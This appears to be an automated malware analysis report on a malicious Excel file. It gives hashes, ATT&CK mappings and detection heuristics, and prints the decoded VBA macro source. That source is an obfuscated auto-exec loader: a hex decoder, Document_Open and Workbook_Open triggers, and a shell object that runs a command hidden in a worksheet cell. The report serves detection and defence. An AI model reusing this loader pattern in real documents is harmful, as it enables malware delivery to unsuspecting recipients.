Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e4681ed7df7fddb1…

MALICIOUS

Office (OLE)

278.0 KB Created: 2018-05-14 08:39:38 Authoring application: Microsoft Excel First seen: 2019-02-26
MD5: 6b5009751f6123212480bee5fa9c1249 SHA-1: 2aec4cbc20d5210ffd0cddad7b0a935a0c3e2aac SHA-256: e4681ed7df7fddb1ef84bc443a694eb1d7ec7b6d0d1781947772b547f53da032
322 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1027 Obfuscated Files or Information

This Excel file contains heavily obfuscated VBA and XLM macros, including Document_Open and Workbook_Open auto-exec functions. The VBA code uses a custom decoder function (AHE_AU) to deobfuscate a string which is then passed to Application.Run, indicating it's designed to execute a secondary payload. The presence of these auto-exec macros and obfuscation techniques strongly suggests a malicious intent to download and execute further malware.

Heuristics 9

  • ClamAV: Xls.Malware.Valyria-6700358-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-6700358-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 229 bytes
SHA-256: b07e9b3c0bc67a5abf1f3d5a279d12af20bcec7c89268c78faaa2dc946b3582d
Preview script
First 1,000 lines of the extracted script
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  MPro
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7614 bytes
SHA-256: 08f41f0b4e57eb228e4eef7fd067a2dc1fdf57906f38c447289ee28063a87883
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 8 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Function ac2AAVCKA() As String
Dim aac2AAVCKA As String
aac2AAVCKA = "9BA0A2B19B829B9B9B7F719B829B9B9B75BB7D9B9B69A69B9B9B849B83A0BA9B6ED49B9B9C9B769B9BA29B63827C9B9B9B88809B9BD59BAA9BA260D69B619B9B8A9BD898877A8D9B9BA49B9B9B8B9B9B7CC3C09B9BAD6B9B9BDBA79BC29BA3D89B9B699B9D9B8D9B9B6E9B89A773B05C9B959B9C9B9B7880A1729B9BD79BC09B9B9B8D9B9B89829BC3109BC99BB09B86A69F8989629B9B9B86B8C4D38E9B049B9BB26E9B6E5D9B9BBC7B9B9B9B9B9B8CAC929B9B9BC3C2619B9BC79BAF"
ac2AAVCKA = aac2AAVCKAEnd Function

Public Function AHE_AU(ByVal AP_LHL As String)
   Dim UF_E As String
   Dim EJO_AQ As Long
   For EJO_AQ = 1 To Len(AP_LHL) Step 2
        UF_E = UF_E & Chr(CLng("&H" & Mid(AP_LHL, EJO_AQ, 2)) - 4)
   Next
   AHE_AU = UF_E
End Function
Public Sub Document_Open()
    Application.Run AHE_AU("56504C4B5E63565053485151534549")
End Sub
Private Function acD4I64CW() As String
Dim aacD4I64CW As String
aacD4I64CW = "9BA0A2B19B829B9B9B7F719B829B9B9B75BB7D9B9B69A69B9B9B849B83A0BA9B6ED49B9B9C9B769B9BA29B63827C9B9B9B88809B9BD59BAA9BA260D69B619B9B8A9BD898877A8D9B9BA49B9B9B8B9B9B7CC3C09B9BAD6B9B9BDBA79BC29BA3D89B9B699B9D9B8D9B9B6E9B89A773B05C9B959B9C9B9B7880A1729B9BD79BC09B9B9B8D9B9B89829BC3109BC99BB09B86A69F8989629B9B9B86B8C4D38E9B049B9BB26E9B6E5D9B9BBC7B9B9B9B9B9B8CAC929B9B9BC3C2619B9BC79BAF"
acD4I64CW = aacD4I64CWEnd Function

Sub Workbook_Open()
    Application.Run "ThisWorkbook." & AHE_AU("56504C4B5E63565053485151534549")
End Sub
Private Function acHF4C4KC() As String
Dim aacHF4C4KC As String
aacHF4C4KC = "9BA0A2B19B829B9B9B7F719B829B9B9B75BB7D9B9B69A69B9B9B849B83A0BA9B6ED49B9B9C9B769B9BA29B63827C9B9B9B88809B9BD59BAA9BA260D69B619B9B8A9BD898877A8D9B9BA49B9B9B8B9B9B7CC3C09B9BAD6B9B9BDBA79BC29BA3D89B9B699B9D9B8D9B9B6E9B89A773B05C9B959B9C9B9B7880A1729B9BD79BC09B9B9B8D9B9B89829BC3109BC99BB09B86A69F8989629B9B9B86B8C4D38E9B049B9BB26E9B6E5D9B9BBC7B9B9B9B9B9B8CAC929B9B9BC3C2619B9BC79BAF"
acHF4C4KC = aacHF4C4KCEnd Function

Public Sub PJB_JJP()
    Dim AP_LHL As Object: Set AP_LHL = VBA.CreateObject(AHE_AU("5B5767766D747832576C697070"))
    AP_LHL.Exec (AHE_AU(ThisWorkbook.Sheets("MProp").Range("J225").Value))
End Sub
Private Function acRD6CFLI() As String
Dim aacRD6CFLI As String
aacRD6CFLI = "9BA0A2B19B829B9B9B7F719B829B9B9B75BB7D9B9B69A69B9B9B849B83A0BA9B6ED49B9B9C9B769B9BA29B63827C9B9B9B88809B9BD59BAA9BA260D69B619B9B8A9BD898877A8D9B9BA49B9B9B8B9B9B7CC3C09B9BAD6B9B9BDBA79BC29BA3D89B9B699B9D9B8D9B9B6E9B89A773B05C9B959B9C9B9B7880A1729B9BD79BC09B9B9B8D9B9B89829BC3109BC99BB09B86A69F8989629B9B9B86B8C4D38E9B049B9BB26E9B6E5D9B9BBC7B9B9B9B9B9B8CAC929B9B9BC3C2619B9BC79BAF"
acRD6CFLI = aacRD6CFLIEnd Function

Sub RLHGZ_RLODMMOAE()
    PJB_JJP
End Sub

' Processing file: /opt/analyzer/scan_staging/e3d7fd8b004b494ea7cab8140a539c42.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 8281 bytes
' Line #0:
' 	Option  (Explicit)
' Line #1:
' 	FuncDefn (Private Function AP_LHL(id_FFFE As String) As String)
' Line #2:
' 	Dim 
' 	VarDefn UF_E (As String)
' Line #3:
' 	LitStr 0x017A "9BA0A2B19B829B9B9B7F719B829B9B9B75BB7D9B9B69A69B9B9B849B83A0BA9B6ED49B9B9C9B769B9BA29B63827C9B9B9B88809B9BD59BAA9BA260D69B619B9B8A9BD898877A8D9B9BA49B9B9B8B9B9B7CC3C09B9BAD6B9B9BDBA79BC29BA3D89B9B699B9D9B8D9B9B6E9B89A773B05C9B959B9C9B9B7880A1729B9BD79BC09B9B9B8D9B9B89829BC3109BC99BB09B86A69F8989629B9B9B86B8C4D38E9B049B9BB26E9B6E5D9B9BBC7B9B9B9B9B9B8CAC929B9B9BC3C2619B9BC79BAF"
' 	St UF_E 
' Line #4:
' 	Reparse 0x0022 "ac2AAVCKA = aac2AAVCKAEnd Function"
' Line #5:
' Line #6:
' 	FuncDefn (Public Function Chr(ByVal Document_Open As String, id_FFFE As Variant))
' Line #7:
' 	Dim 
' 	VarDefn Application (As String)
' Line #8:
' 	Dim 
' 	VarDefn Run (As L
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.